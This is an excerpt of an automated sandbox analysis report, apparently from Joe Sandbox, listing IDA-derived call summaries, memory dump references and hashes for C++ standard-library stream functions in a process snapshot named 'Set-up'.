                                                                                                • Part of subcall function 6BC262D7: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262E8
                                                                                                • Part of subcall function 6BC262D7: int.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262FF
                                                                                                • Part of subcall function 6BC262D7: std::locale::_Getfacet.LIBCPMT ref: 6BC26308
                                                                                                • Part of subcall function 6BC262D7: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC26368
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,0000002C), ref: 6BC2E489
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefG@std@@@std@@GetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@U?$char_traits@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 587729422-0
                                                                                              • Opcode ID: 2b616fa570c1fbcb81c4bd7a15d8051318370cbf312870696be5a8c0368dc709
                                                                                              • Instruction ID: 458050e441bb43387c11b2e6dd93dc1c9bd0726896778e5174fe6592f740a330
                                                                                              • Opcode Fuzzy Hash: 2b616fa570c1fbcb81c4bd7a15d8051318370cbf312870696be5a8c0368dc709
                                                                                              • Instruction Fuzzy Hash: 2D318B719252099FCF04CFE8C994AEDBBBABF08304F244059E546B7281E7389B04CB61
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2B293
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,0000002C), ref: 6BC2B2B2
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,0000002C), ref: 6BC2B2D7
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26191: __EH_prolog3.LIBCMT ref: 6BC26198
                                                                                                • Part of subcall function 6BC26191: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261A2
                                                                                                • Part of subcall function 6BC26191: int.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261B9
                                                                                                • Part of subcall function 6BC26191: std::locale::_Getfacet.LIBCPMT ref: 6BC261C2
                                                                                                • Part of subcall function 6BC26191: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26222
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,0000002C), ref: 6BC2B390
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?getloc@ios_base@std@@D@std@@@std@@H_prolog3_catchU?$char_traits@U?$char_traits@_Vlocale@2@W@std@@@std@@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 3082886559-0
                                                                                              • Opcode ID: 1c6905479e5d38b934c210dc331e2dfcee2d727dfb79ae9097d86e2b717db4b0
                                                                                              • Instruction ID: 1236c0b45e7c80e6e60a6e505184b6247115765cc0e83ee36fecf2c96b084d8e
                                                                                              • Opcode Fuzzy Hash: 1c6905479e5d38b934c210dc331e2dfcee2d727dfb79ae9097d86e2b717db4b0
                                                                                              • Instruction Fuzzy Hash: A8318B71A152099FCB04CFA8C990AEDBBB5BF48304F24405DE046B7291EB389B05CB61
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2EB0F
                                                                                              • ?_Ipfx@?$basic_istream@GU?$char_traits@G@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2EB2E
                                                                                                • Part of subcall function 6BC1E00D: __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                                • Part of subcall function 6BC1E00D: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1E00D: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                                • Part of subcall function 6BC1E00D: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                                • Part of subcall function 6BC1E00D: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2EB4C
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC262D7: __EH_prolog3.LIBCMT ref: 6BC262DE
                                                                                                • Part of subcall function 6BC262D7: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262E8
                                                                                                • Part of subcall function 6BC262D7: int.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262FF
                                                                                                • Part of subcall function 6BC262D7: std::locale::_Getfacet.LIBCPMT ref: 6BC26308
                                                                                                • Part of subcall function 6BC262D7: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC26368
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2EBB0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefG@std@@@std@@GetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@U?$char_traits@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 587729422-0
                                                                                              • Opcode ID: f0b94767b50d3f1a36d121ee8afed4fe09670e7e455b88d733f00b14fcdc6ca0
                                                                                              • Instruction ID: daf57d32d8e8dc5edfa050315de1c40488b4b292018828980413ae7d31449be4
                                                                                              • Opcode Fuzzy Hash: f0b94767b50d3f1a36d121ee8afed4fe09670e7e455b88d733f00b14fcdc6ca0
                                                                                              • Instruction Fuzzy Hash: B921AC71A11108AFCB04CFA8C981EEDBBB9AF18308F244059E142B7381EB399F04DB60
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2BB1D
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2BB3C
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2BB5A
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26191: __EH_prolog3.LIBCMT ref: 6BC26198
                                                                                                • Part of subcall function 6BC26191: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261A2
                                                                                                • Part of subcall function 6BC26191: int.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261B9
                                                                                                • Part of subcall function 6BC26191: std::locale::_Getfacet.LIBCPMT ref: 6BC261C2
                                                                                                • Part of subcall function 6BC26191: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26222
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2BBBE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?getloc@ios_base@std@@D@std@@@std@@H_prolog3_catchU?$char_traits@U?$char_traits@_Vlocale@2@W@std@@@std@@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 3082886559-0
                                                                                              • Opcode ID: 7abe474442cb09066b229761916ae86317e429052173de914943fead4a20a050
                                                                                              • Instruction ID: 69c79fa8bde4ec9c20e7d49a3be1d338065b4ea607e52f3b9de8756de43c4fb4
                                                                                              • Opcode Fuzzy Hash: 7abe474442cb09066b229761916ae86317e429052173de914943fead4a20a050
                                                                                              • Instruction Fuzzy Hash: 5E21AC71A15208AFCB05CFE8C991EDDBBB5AF18308F24409DE142B7281EB799F44DB60
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2EA08
                                                                                              • ?_Ipfx@?$basic_istream@GU?$char_traits@G@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2EA27
                                                                                                • Part of subcall function 6BC1E00D: __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                                • Part of subcall function 6BC1E00D: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1E00D: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                                • Part of subcall function 6BC1E00D: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                                • Part of subcall function 6BC1E00D: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2EA45
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC262D7: __EH_prolog3.LIBCMT ref: 6BC262DE
                                                                                                • Part of subcall function 6BC262D7: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262E8
                                                                                                • Part of subcall function 6BC262D7: int.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262FF
                                                                                                • Part of subcall function 6BC262D7: std::locale::_Getfacet.LIBCPMT ref: 6BC26308
                                                                                                • Part of subcall function 6BC262D7: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC26368
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2EAA9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefG@std@@@std@@GetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@U?$char_traits@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 587729422-0
                                                                                              • Opcode ID: 4502116a8a8c43954a1b7379ab689623d5cfcfb1a42d313112f694cc5c8c16f6
                                                                                              • Instruction ID: 3993ef700804abefff7a16b937bfeb2b45d1eadd78b21c76b0ae0a75333590ac
                                                                                              • Opcode Fuzzy Hash: 4502116a8a8c43954a1b7379ab689623d5cfcfb1a42d313112f694cc5c8c16f6
                                                                                              • Instruction Fuzzy Hash: 4B21AC71A11108EFCB04CFA8C981FEDBBB9AF18308F244059E142B7281EB399F44DB60
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2BA16
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2BA35
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2BA53
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26191: __EH_prolog3.LIBCMT ref: 6BC26198
                                                                                                • Part of subcall function 6BC26191: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261A2
                                                                                                • Part of subcall function 6BC26191: int.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261B9
                                                                                                • Part of subcall function 6BC26191: std::locale::_Getfacet.LIBCPMT ref: 6BC261C2
                                                                                                • Part of subcall function 6BC26191: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26222
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2BAB7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?getloc@ios_base@std@@D@std@@@std@@H_prolog3_catchU?$char_traits@U?$char_traits@_Vlocale@2@W@std@@@std@@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 3082886559-0
                                                                                              • Opcode ID: a14e7ae4b43c4e56ff106a48e41545615a178934f78f61ab8a9972e4abe6aef0
                                                                                              • Instruction ID: 5da3b052d710b316efa34dd12594d0837d2264d510e3950d228e76c133daa020
                                                                                              • Opcode Fuzzy Hash: a14e7ae4b43c4e56ff106a48e41545615a178934f78f61ab8a9972e4abe6aef0
                                                                                              • Instruction Fuzzy Hash: 5D21AC71A11108AFCB04CFE8C991EEDBBB5AF18308F244059E142B7281EB799F44DB60
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2C9D0
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2C9EF
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2CA0D
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26234: __EH_prolog3.LIBCMT ref: 6BC2623B
                                                                                                • Part of subcall function 6BC26234: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC26245
                                                                                                • Part of subcall function 6BC26234: int.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC2625C
                                                                                                • Part of subcall function 6BC26234: std::locale::_Getfacet.LIBCPMT ref: 6BC26265
                                                                                                • Part of subcall function 6BC26234: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC262C5
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2CA71
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@_LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 565754905-0
                                                                                              • Opcode ID: a2c8d80e6896063ac62ad9780d8a882e57f37f3a38e366d5787fdf95727478ea
                                                                                              • Instruction ID: 9dbb84b37dcd6b2bc042765bc3e347e05025856482b53763ddc96902857e71a6
                                                                                              • Opcode Fuzzy Hash: a2c8d80e6896063ac62ad9780d8a882e57f37f3a38e366d5787fdf95727478ea
                                                                                              • Instruction Fuzzy Hash: F5217C71A15108EFCB05CFA8C991EDDFBB5AF58308F244059E542B7291EB799F04DB60
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2B90F
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2B92E
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2B94C
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
